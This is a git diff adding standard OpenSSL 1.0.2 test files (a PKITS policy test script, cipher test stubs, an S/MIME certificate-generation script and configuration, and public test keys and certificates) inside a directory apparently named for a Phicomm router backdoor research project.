+                if (/^Authority Policies/) {
+                    if (/empty/) {
+                        $aset = "<empty>";
+                    }
+                    else {
+                        $pol = 1;
+                    }
+                }
+                $test_fail = 1 if (/leak/i);
+                if (/^User Policies/) {
+                    if (/empty/) {
+                        $uset = "<empty>";
+                    }
+                    else {
+                        $pol = 2;
+                    }
+                }
+                if (/\s+Policy: (.*)$/) {
+                    if ( $pol == 1 ) {
+                        $aset .= ":" if $aset ne "";
+                        $aset .= $1;
+                    }
+                    elsif ( $pol == 2 ) {
+                        $uset .= ":" if $uset ne "";
+                        $uset .= $1;
+                    }
+                }
+            }
+
+            if ( $epol ne $exp_epol ) {
+                $errmsg .= "Explicit policy:$epol, ";
+                $errmsg .= "expected $exp_epol\n";
+                $test_fail = 1;
+            }
+            if ( $aset ne $exp_aset ) {
+                $errmsg .= "Authority policy set :$aset, ";
+                $errmsg .= "expected $exp_aset\n";
+                $test_fail = 1;
+            }
+            if ( $uset ne $exp_uset ) {
+                $errmsg .= "User policy set :$uset, ";
+                $errmsg .= "expected $exp_uset\n";
+                $test_fail = 1;
+            }
+
+            if ( $exp_ret != $ret ) {
+                print "Return code:$ret, expected $exp_ret\n";
+                $test_fail = 1;
+            }
+
+            if ($test_fail) {
+                print "$tnum $title : Failed!\n";
+                print "Filename: $pkitsdir/$filename\n";
+                print "Command output:\n$cmdout\n";
+                $numfail++;
+            }
+            $numtest++;
+        }
+    }
+}
+
+if ($numfail) {
+    print "$numfail tests failed out of $numtest\n";
+}
+else {
+    print "All Tests Successful.\n";
+}
+
+unlink "pkitsta.pem";
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/r160test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/r160test.c
new file mode 100644
index 0000000..548fa52
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/r160test.c
@@ -0,0 +1,57 @@
+/* test/r160test.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/randtest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/randtest.c
new file mode 120000
index 0000000..a2b107a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/randtest.c
@@ -0,0 +1 @@
+../crypto/rand/randtest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rc2test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rc2test.c
new file mode 120000
index 0000000..5c53ad9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rc2test.c
@@ -0,0 +1 @@
+../crypto/rc2/rc2test.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rc4test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rc4test.c
new file mode 120000
index 0000000..061ac37
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rc4test.c
@@ -0,0 +1 @@
+../crypto/rc4/rc4test.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rc5test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rc5test.c
new file mode 100644
index 0000000..554acc2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rc5test.c
@@ -0,0 +1,57 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <ctype.h>
+#include <openssl/e_os2.h>
+#include <openssl/buffer.h>
+#include <openssl/crypto.h>
+
+int main(int argc, char *argv[])
+{
+    char *p, *q = 0, *program;
+
+    p = strrchr(argv[0], '/');
+    if (!p)
+        p = strrchr(argv[0], '\\');
+#ifdef OPENSSL_SYS_VMS
+    if (!p)
+        p = strrchr(argv[0], ']');
+    if (p)
+        q = strrchr(p, '>');
+    if (q)
+        p = q;
+    if (!p)
+        p = strrchr(argv[0], ':');
+    q = 0;
+#endif
+    if (p)
+        p++;
+    if (!p)
+        p = argv[0];
+    if (p)
+        q = strchr(p, '.');
+    if (p && !q)
+        q = p + strlen(p);
+
+    if (!p)
+        program = BUF_strdup("(unknown)");
+    else {
+        program = OPENSSL_malloc((q - p) + 1);
+        strncpy(program, p, q - p);
+        program[q - p] = '\0';
+    }
+
+    for (p = program; *p; p++)
+        if (islower((unsigned char)(*p)))
+            *p = toupper((unsigned char)(*p));
+
+    q = strstr(program, "TEST");
+    if (q > p && q[-1] == '_')
+        q--;
+    *q = '\0';
+
+    printf("No %s support\n", program);
+
+    OPENSSL_free(program);
+    return (0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rmdtest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rmdtest.c
new file mode 120000
index 0000000..ce66460
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rmdtest.c
@@ -0,0 +1 @@
+../crypto/ripemd/rmdtest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rsa_test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rsa_test.c
new file mode 120000
index 0000000..aaea20d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/rsa_test.c
@@ -0,0 +1 @@
+../crypto/rsa/rsa_test.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/serverinfo.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/serverinfo.pem
new file mode 100644
index 0000000..cd3020e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/serverinfo.pem
@@ -0,0 +1,16 @@
+-----BEGIN SERVERINFO FOR CT-----
+ABIAZMevsj4TC5rgwjZNciLGwh15YXoIK9t5aypGJIG4QzyMowmwwDdqxudkUcGa
+DvuqlYL7psO5j4/BIHTe677CAZBBH3Ho2NOM5q1zub4AbfUMlKeufuQgeQ2Tj1oe
+LJLRzrwDnPs=
+-----END SERVERINFO FOR CT-----
+
+-----BEGIN SERVERINFO FOR TACK-----
+8wABTwFMh1Dz+3W6zULWJKjav5TNaFEXL1h98YtCXeyZnORYg4mbKpxH5CMbjpgx
+To3amSqUPF4Ntjc/i9+poutxebYkbgAAAkMcxb8+RaM9YEywaJEGViKJJmpYG/gJ
+HgfGaefI9kKbXSDmP9ntg8dLvDzuyYw14ktM2850Q9WvBiltpekilZxVuT2bFtfs
+cmS++SAK9YOM8RrKhL1TLmrktoBEJZ6z5GTukYdQ8/t1us1C1iSo2r+UzWhRFy9Y
+ffGLQl3smZzkWIOJmyqcR+QjG46YMU6N2pkqlDxeDbY3P4vfqaLrcXm2JG4AAAGN
+xXQJPbdniI9rEydVXb1Cu1yT/t7FBEx6hLxuoypXjCI1wCGpXsd8zEnloR0Ank5h
+VO/874E/BZlItzSPpcmDKl5Def6BrAJTErQlE9npo52S05YWORxJw1+VYBdqQ09A
+x3wA
+-----END SERVERINFO FOR TACK-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/sha1test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/sha1test.c
new file mode 120000
index 0000000..8d66e9e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/sha1test.c
@@ -0,0 +1 @@
+../crypto/sha/sha1test.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/sha256t.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/sha256t.c
new file mode 120000
index 0000000..952a508
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/sha256t.c
@@ -0,0 +1 @@
+../crypto/sha/sha256t.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/sha512t.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/sha512t.c
new file mode 120000
index 0000000..c80d152
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/sha512t.c
@@ -0,0 +1 @@
+../crypto/sha/sha512t.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/shatest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/shatest.c
new file mode 120000
index 0000000..43cfda7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/shatest.c
@@ -0,0 +1 @@
+../crypto/sha/shatest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smcont.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smcont.txt
new file mode 100644
index 0000000..e837c0b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smcont.txt
@@ -0,0 +1 @@
+Some test content for OpenSSL CMS
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/ca.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/ca.cnf
new file mode 100644
index 0000000..5e8b108
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/ca.cnf
@@ -0,0 +1,66 @@
+#
+# OpenSSL example configuration file for automated certificate creation.
+#
+
+# This definition stops the following lines choking if HOME or CN
+# is undefined.
+HOME			= .
+RANDFILE		= $ENV::HOME/.rnd
+CN			= "Not Defined"
+default_ca		= ca
+
+####################################################################
+[ req ]
+default_bits		= 2048
+default_keyfile 	= privkey.pem
+# Don't prompt for fields: use those in section directly
+prompt			= no
+distinguished_name	= req_distinguished_name
+x509_extensions	= v3_ca	# The extentions to add to the self signed cert
+string_mask = utf8only
+
+# req_extensions = v3_req # The extensions to add to a certificate request
+
+[ req_distinguished_name ]
+countryName			= UK
+
+organizationName		= OpenSSL Group
+# Take CN from environment so it can come from a script.
+commonName			= $ENV::CN
+
+[ usr_cert ]
+
+# These extensions are added when 'ca' signs a request for an end entity
+# certificate
+
+basicConstraints=critical, CA:FALSE
+keyUsage=critical, nonRepudiation, digitalSignature, keyEncipherment
+
+# PKIX recommendations harmless if included in all certificates.
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid
+
+[ dh_cert ]
+
+# These extensions are added when 'ca' signs a request for an end entity
+# DH certificate
+
+basicConstraints=critical, CA:FALSE
+keyUsage=critical, keyAgreement
+
+# PKIX recommendations harmless if included in all certificates.
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid
+
+[ v3_ca ]
+
+
+# Extensions for a typical CA
+
+# PKIX recommendation.
+
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid:always
+basicConstraints = critical,CA:true
+keyUsage = critical, cRLSign, keyCertSign
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/mksmime-certs.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/mksmime-certs.sh
new file mode 100644
index 0000000..f01f664
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/mksmime-certs.sh
@@ -0,0 +1,74 @@
+#!/bin/sh
+
+# Utility to recreate S/MIME certificates
+
+OPENSSL=../../apps/openssl
+OPENSSL_CONF=./ca.cnf
+export OPENSSL_CONF
+
+# Root CA: create certificate directly
+CN="Test S/MIME RSA Root" $OPENSSL req -config ca.cnf -x509 -nodes \
+	-keyout smroot.pem -out smroot.pem -newkey rsa:2048 -days 3650
+
+# EE RSA certificates: create request first
+CN="Test S/MIME EE RSA #1" $OPENSSL req -config ca.cnf -nodes \
+	-keyout smrsa1.pem -out req.pem -newkey rsa:2048
+# Sign request: end entity extensions
+$OPENSSL x509 -req -in req.pem -CA smroot.pem -days 3600 \
+	-extfile ca.cnf -extensions usr_cert -CAcreateserial >>smrsa1.pem
+
+CN="Test S/MIME EE RSA #2" $OPENSSL req -config ca.cnf -nodes \
+	-keyout smrsa2.pem -out req.pem -newkey rsa:2048
+$OPENSSL x509 -req -in req.pem -CA smroot.pem -days 3600 \
+	-extfile ca.cnf -extensions usr_cert -CAcreateserial >>smrsa2.pem
+
+CN="Test S/MIME EE RSA #3" $OPENSSL req -config ca.cnf -nodes \
+	-keyout smrsa3.pem -out req.pem -newkey rsa:2048
+$OPENSSL x509 -req -in req.pem -CA smroot.pem -days 3600 \
+	-extfile ca.cnf -extensions usr_cert -CAcreateserial >>smrsa3.pem
+
+# Create DSA parameters
+
+$OPENSSL dsaparam -out dsap.pem 2048
+
+CN="Test S/MIME EE DSA #1" $OPENSSL req -config ca.cnf -nodes \
+	-keyout smdsa1.pem -out req.pem -newkey dsa:dsap.pem
+$OPENSSL x509 -req -in req.pem -CA smroot.pem -days 3600 \
+	-extfile ca.cnf -extensions usr_cert -CAcreateserial >>smdsa1.pem
+CN="Test S/MIME EE DSA #2" $OPENSSL req -config ca.cnf -nodes \
+	-keyout smdsa2.pem -out req.pem -newkey dsa:dsap.pem
+$OPENSSL x509 -req -in req.pem -CA smroot.pem -days 3600 \
+	-extfile ca.cnf -extensions usr_cert -CAcreateserial >>smdsa2.pem
+CN="Test S/MIME EE DSA #3" $OPENSSL req -config ca.cnf -nodes \
+	-keyout smdsa3.pem -out req.pem -newkey dsa:dsap.pem
+$OPENSSL x509 -req -in req.pem -CA smroot.pem -days 3600 \
+	-extfile ca.cnf -extensions usr_cert -CAcreateserial >>smdsa3.pem
+
+# Create EC parameters
+
+$OPENSSL ecparam -out ecp.pem -name P-256
+$OPENSSL ecparam -out ecp2.pem -name K-283
+
+CN="Test S/MIME EE EC #1" $OPENSSL req -config ca.cnf -nodes \
+	-keyout smec1.pem -out req.pem -newkey ec:ecp.pem
+$OPENSSL x509 -req -in req.pem -CA smroot.pem -days 3600 \
+	-extfile ca.cnf -extensions usr_cert -CAcreateserial >>smec1.pem
+CN="Test S/MIME EE EC #2" $OPENSSL req -config ca.cnf -nodes \
+	-keyout smec2.pem -out req.pem -newkey ec:ecp2.pem
+$OPENSSL x509 -req -in req.pem -CA smroot.pem -days 3600 \
+	-extfile ca.cnf -extensions usr_cert -CAcreateserial >>smec2.pem
+# Create X9.42 DH parameters.
+$OPENSSL genpkey -genparam -algorithm DH -pkeyopt dh_paramgen_type:2 \
+	-out dhp.pem
+# Generate X9.42 DH key.
+$OPENSSL genpkey -paramfile dhp.pem -out smdh.pem
+$OPENSSL pkey -pubout -in smdh.pem -out dhpub.pem
+# Generate dummy request.
+CN="Test S/MIME EE DH #1" $OPENSSL req -config ca.cnf -nodes \
+	-keyout smtmp.pem -out req.pem -newkey rsa:2048
+# Sign request but force public key to DH
+$OPENSSL x509 -req -in req.pem -CA smroot.pem -days 3600 \
+	-force_pubkey dhpub.pem \
+	-extfile ca.cnf -extensions usr_cert -CAcreateserial >>smdh.pem
+# Remove temp files.
+rm -f req.pem ecp.pem ecp2.pem dsap.pem dhp.pem dhpub.pem smtmp.pem smroot.srl
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdh.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdh.pem
new file mode 100644
index 0000000..f831b07
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdh.pem
@@ -0,0 +1,33 @@
+-----BEGIN PRIVATE KEY-----
+MIIBSgIBADCCASsGByqGSM4+AgEwggEeAoGBANQMSgwEcnEZ31kZxa9Ef8qOK/AJ
+9dMlsXMWVYnf/QevGdN/0Aei/j9a8QHG+CvvTm0DOEKhN9QUtABKsYZag865CA7B
+mSdHjQuFqILtzA25sDJ+3+jk9vbss+56ETRll/wasJVLGbmmHNkBMvc1fC1d/sGF
+cEn4zJnQvvFaeMgDAoGAaQD9ZvL8FYsJuNxN6qp5VfnfRqYvyi2PWSqtRKPGGC+V
+thYg49PRjwPOcXzvOsdEOQ7iH9jTiSvnUdwSSEwYTZkSBuQXAgOMJAWOpoXyaRvh
+atziBDoBnWS+/kX5RBhxvS0+em9yfRqAQleuGG+R1mEDihyJc8dWQQPT+O1l4oUC
+FQCJlKsQZ0VBrWPGcUCNa54ZW6TH9QQWAhRR2NMZrQSfWthXDO8Lj5WZ34zQrA==
+-----END PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIID/zCCAuegAwIBAgIJANv1TSKgememMA0GCSqGSIb3DQEBBQUAMEQxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRUZXN0IFMv
+TUlNRSBSU0EgUm9vdDAeFw0xMzA4MDIxNDQ5MjlaFw0yMzA2MTExNDQ5MjlaMEQx
+CzAJBgNVBAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRU
+ZXN0IFMvTUlNRSBFRSBESCAjMTCCAbYwggErBgcqhkjOPgIBMIIBHgKBgQDUDEoM
+BHJxGd9ZGcWvRH/KjivwCfXTJbFzFlWJ3/0HrxnTf9AHov4/WvEBxvgr705tAzhC
+oTfUFLQASrGGWoPOuQgOwZknR40LhaiC7cwNubAyft/o5Pb27LPuehE0ZZf8GrCV
+Sxm5phzZATL3NXwtXf7BhXBJ+MyZ0L7xWnjIAwKBgGkA/Wby/BWLCbjcTeqqeVX5
+30amL8otj1kqrUSjxhgvlbYWIOPT0Y8DznF87zrHRDkO4h/Y04kr51HcEkhMGE2Z
+EgbkFwIDjCQFjqaF8mkb4Wrc4gQ6AZ1kvv5F+UQYcb0tPnpvcn0agEJXrhhvkdZh
+A4ociXPHVkED0/jtZeKFAhUAiZSrEGdFQa1jxnFAjWueGVukx/UDgYQAAoGAL1ve
+cgI2awBeJH8ULBhSQpdL224VUDxFPiXzt8Vu5VLnxPv0pfA5En+8VByTuV7u6RSw
+3/78NuTyr/sTyN8YlB1AuXHdTJynA1ICte1xgD4j2ijlq+dv8goOAFt9xkvXx7LD
+umJ/cCignXETcNGfMi8+0s0bpMZyoHRdce8DQ26jYDBeMAwGA1UdEwEB/wQCMAAw
+DgYDVR0PAQH/BAQDAgXgMB0GA1UdDgQWBBQLWk1ffSXH8p3Bqrdjgi/6jzLnwDAf
+BgNVHSMEGDAWgBTffl6IBSQzCN0igQKXzJq3sTMnMDANBgkqhkiG9w0BAQUFAAOC
+AQEAWvJj79MW1/Wq3RIANgAhonsI1jufYqxTH+1M0RU0ZXHulgem77Le2Ls1bizi
+0SbvfpTiiFGkbKonKtO2wvfqwwuptSg3omMI5IjAGxYbyv2KBzIpp1O1LTDk9RbD
+48JMMF01gByi2+NLUQ1MYF+5RqyoRqcyp5x2+Om1GeIM4Q/GRuI4p4dybWy8iC+d
+LeXQfR7HXfh+tAum+WzjfLJwbnWbHmPhTbKB01U4lBp6+r8BGHAtNdPjEHqap4/z
+vVZVXti9ThZ20EhM+VFU3y2wyapeQjhQvw/A2YRES0Ik7BSj3hHfWH/CTbLVQnhu
+Uj6tw18ExOYxqoEGixNLPA5qsQ==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsa1.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsa1.pem
new file mode 100644
index 0000000..b424f67
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsa1.pem
@@ -0,0 +1,47 @@
+-----BEGIN PRIVATE KEY-----
+MIICZQIBADCCAjkGByqGSM44BAEwggIsAoIBAQCQfLlNdehPnTrGIMhw4rk0uua6
+k1nCG3zcyfXli17BdB2k0HBPaTA3a3ZHfOt1Awy0Uu0wZ3gdPr9z0I64hnJXIGou
+zIanZ7nYRImHtX5JMFbXeyxo1Owd2Zs3oEk9nQUoUsMxvmYC/ghPL5Zx1pPxcHCO
+wzWxoG4yZMjimXOc1/W7zvK/4/g/Cz9fItD3zdcydfgM/hK0/CeYQ21xfhqf4mjK
+v9plnCcWgToGI+7H8VK80MFbkO2QKRz3vP1/TjK6PRm9sEeB5b10+SvGv2j2w+CC
+0fXL4s6n7PtBlm/bww8xL1/Az8kwejUcII1Dc8uNwwISwGbwaGBvl7IHpm21AiEA
+rodZi+nCKZdTL8IgCjX3n0DuhPRkVQPjz/B6VweLW9MCggEAfimkUNwnsGFp7mKM
+zJKhHoQkMB1qJzyIHjDzQ/J1xjfoF6i27afw1/WKboND5eseZhlhA2TO5ZJB6nGx
+DOE9lVQxYVml++cQj6foHh1TVJAgGl4mWuveW/Rz+NEhpK4zVeEsfMrbkBypPByy
+xzF1Z49t568xdIo+e8jLI8FjEdXOIUg4ehB3NY6SL8r4oJ49j/sJWfHcDoWH/LK9
+ZaBF8NpflJe3F40S8RDvM8j2HC+y2Q4QyKk1DXGiH+7yQLGWzr3M73kC3UBnnH0h
+Hxb7ISDCT7dCw/lH1nCbVFBOM0ASI26SSsFSXQrvD2kryRcTZ0KkyyhhoPODWpU+
+TQMsxQQjAiEAkolGvb/76X3vm5Ov09ezqyBYt9cdj/FLH7DyMkxO7X0=
+-----END PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIFkDCCBHigAwIBAgIJANk5lu6mSyBDMA0GCSqGSIb3DQEBBQUAMEQxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRUZXN0IFMv
+TUlNRSBSU0EgUm9vdDAeFw0xMzA3MTcxNzI4MzFaFw0yMzA1MjYxNzI4MzFaMEUx
+CzAJBgNVBAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR4wHAYDVQQDDBVU
+ZXN0IFMvTUlNRSBFRSBEU0EgIzEwggNGMIICOQYHKoZIzjgEATCCAiwCggEBAJB8
+uU116E+dOsYgyHDiuTS65rqTWcIbfNzJ9eWLXsF0HaTQcE9pMDdrdkd863UDDLRS
+7TBneB0+v3PQjriGclcgai7MhqdnudhEiYe1fkkwVtd7LGjU7B3ZmzegST2dBShS
+wzG+ZgL+CE8vlnHWk/FwcI7DNbGgbjJkyOKZc5zX9bvO8r/j+D8LP18i0PfN1zJ1
++Az+ErT8J5hDbXF+Gp/iaMq/2mWcJxaBOgYj7sfxUrzQwVuQ7ZApHPe8/X9OMro9
+Gb2wR4HlvXT5K8a/aPbD4ILR9cvizqfs+0GWb9vDDzEvX8DPyTB6NRwgjUNzy43D
+AhLAZvBoYG+XsgembbUCIQCuh1mL6cIpl1MvwiAKNfefQO6E9GRVA+PP8HpXB4tb
+0wKCAQB+KaRQ3CewYWnuYozMkqEehCQwHWonPIgeMPND8nXGN+gXqLbtp/DX9Ypu
+g0Pl6x5mGWEDZM7lkkHqcbEM4T2VVDFhWaX75xCPp+geHVNUkCAaXiZa695b9HP4
+0SGkrjNV4Sx8ytuQHKk8HLLHMXVnj23nrzF0ij57yMsjwWMR1c4hSDh6EHc1jpIv
+yvignj2P+wlZ8dwOhYf8sr1loEXw2l+Ul7cXjRLxEO8zyPYcL7LZDhDIqTUNcaIf
+7vJAsZbOvczveQLdQGecfSEfFvshIMJPt0LD+UfWcJtUUE4zQBIjbpJKwVJdCu8P
+aSvJFxNnQqTLKGGg84NalT5NAyzFA4IBBQACggEAGXSQADbuRIZBjiQ6NikwZl+x
+EDEffIE0RWbvwf1tfWxw4ZvanO/djyz5FePO0AIJDBCLUjr9D32nkmIG1Hu3dWgV
+86knQsM6uFiMSzY9nkJGZOlH3w4NHLE78pk75xR1sg1MEZr4x/t+a/ea9Y4AXklE
+DCcaHtpMGeAx3ZAqSKec+zQOOA73JWP1/gYHGdYyTQpQtwRTsh0Gi5mOOdpoJ0vp
+O83xYbFCZ+ZZKX1RWOjJe2OQBRtw739q1nRga1VMLAT/LFSQsSE3IOp8hiWbjnit
+1SE6q3II2a/aHZH/x4OzszfmtQfmerty3eQSq3bgajfxCsccnRjSbLeNiazRSKNg
+MF4wDAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwHQYDVR0OBBYEFNHQYTOO
+xaZ/N68OpxqjHKuatw6sMB8GA1UdIwQYMBaAFMmRUwpjexZbi71E8HaIqSTm5bZs
+MA0GCSqGSIb3DQEBBQUAA4IBAQAAiLociMMXcLkO/uKjAjCIQMrsghrOrxn4ZGBx
+d/mCTeqPxhcrX2UorwxVCKI2+Dmz5dTC2xKprtvkiIadJamJmxYYzeF1pgRriFN3
+MkmMMkTbe/ekSvSeMtHQ2nHDCAJIaA/k9akWfA0+26Ec25/JKMrl3LttllsJMK1z
+Xj7TcQpAIWORKWSNxY/ezM34+9ABHDZB2waubFqS+irlZsn38aZRuUI0K67fuuIt
+17vMUBqQpe2hfNAjpZ8dIpEdAGjQ6izV2uwP1lXbiaK9U4dvUqmwyCIPniX7Hpaf
+0VnX0mEViXMT6vWZTjLBUv0oKmO7xBkWHIaaX6oyF32pK5AO
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsa2.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsa2.pem
new file mode 100644
index 0000000..648447f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smdsa2.pem
@@ -0,0 +1,47 @@
+-----BEGIN PRIVATE KEY-----
+MIICZAIBADCCAjkGByqGSM44BAEwggIsAoIBAQCQfLlNdehPnTrGIMhw4rk0uua6
+k1nCG3zcyfXli17BdB2k0HBPaTA3a3ZHfOt1Awy0Uu0wZ3gdPr9z0I64hnJXIGou
+zIanZ7nYRImHtX5JMFbXeyxo1Owd2Zs3oEk9nQUoUsMxvmYC/ghPL5Zx1pPxcHCO
+wzWxoG4yZMjimXOc1/W7zvK/4/g/Cz9fItD3zdcydfgM/hK0/CeYQ21xfhqf4mjK
+v9plnCcWgToGI+7H8VK80MFbkO2QKRz3vP1/TjK6PRm9sEeB5b10+SvGv2j2w+CC
+0fXL4s6n7PtBlm/bww8xL1/Az8kwejUcII1Dc8uNwwISwGbwaGBvl7IHpm21AiEA
+rodZi+nCKZdTL8IgCjX3n0DuhPRkVQPjz/B6VweLW9MCggEAfimkUNwnsGFp7mKM
